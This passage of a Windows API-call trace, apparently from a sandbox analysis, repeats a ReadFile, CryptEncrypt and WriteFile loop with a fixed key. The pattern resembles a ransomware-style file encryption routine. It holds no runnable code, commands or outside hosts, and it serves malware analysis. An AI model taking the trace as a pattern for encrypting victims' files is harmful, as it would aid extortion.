pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.598] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.598] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.598] CryptEncrypt (in: hKey=0x2fb7c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.598] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.598] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.598] CryptEncrypt (in: hKey=0x2fb7c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.598] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.598] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.599] CryptEncrypt (in: hKey=0x2fb7c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.599] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.599] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.599] CryptEncrypt (in: hKey=0x2fb7c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.599] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.599] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.599] CryptEncrypt (in: hKey=0x2fb7c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.599] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.599] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.599] CryptEncrypt (in: hKey=0x2fb7c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.599] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.599] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.599] CryptEncrypt (in: hKey=0x2fb7c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.599] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.600] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.600] CryptEncrypt (in: hKey=0x2fb7c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.600] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.600] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.600] CryptEncrypt (in: hKey=0x2fb7c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.600] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.616] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.617] CryptEncrypt (in: hKey=0x2fb7c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.617] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.617] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.617] CryptEncrypt (in: hKey=0x2fb7c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.617] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.617] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.617] CryptEncrypt (in: hKey=0x2fb7c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.617] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.617] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.617] CryptEncrypt (in: hKey=0x2fb7c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.617] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.617] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.617] CryptEncrypt (in: hKey=0x2fb7c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.617] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.618] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.618] CryptEncrypt (in: hKey=0x2fb7c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.618] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.618] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.618] CryptEncrypt (in: hKey=0x2fb7c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.618] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.618] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.618] CryptEncrypt (in: hKey=0x2fb7c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.618] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.618] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.618] CryptEncrypt (in: hKey=0x2fb7c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.618] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.619] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.619] CryptEncrypt (in: hKey=0x2fb7c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.619] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.619] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.619] CryptEncrypt (in: hKey=0x2fb7c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.619] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.619] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.619] CryptEncrypt (in: hKey=0x2fb7c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.619] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.619] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.619] CryptEncrypt (in: hKey=0x2fb7c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.619] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.620] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.620] CryptEncrypt (in: hKey=0x2fb7c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.620] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.620] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.620] CryptEncrypt (in: hKey=0x2fb7c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.620] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.620] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.620] CryptEncrypt (in: hKey=0x2fb7c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.620] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.620] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.620] CryptEncrypt (in: hKey=0x2fb7c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.620] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.620] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.621] CryptEncrypt (in: hKey=0x2fb7c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.621] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.621] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.621] CryptEncrypt (in: hKey=0x2fb7c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.621] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.621] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.621] CryptEncrypt (in: hKey=0x2fb7c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.621] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.621] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.621] CryptEncrypt (in: hKey=0x2fb7c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.621] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.621] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.621] CryptEncrypt (in: hKey=0x2fb7c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.621] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.622] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.622] CryptEncrypt (in: hKey=0x2fb7c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.622] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.622] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.622] CryptEncrypt (in: hKey=0x2fb7c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.622] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.622] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.622] CryptEncrypt (in: hKey=0x2fb7c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, 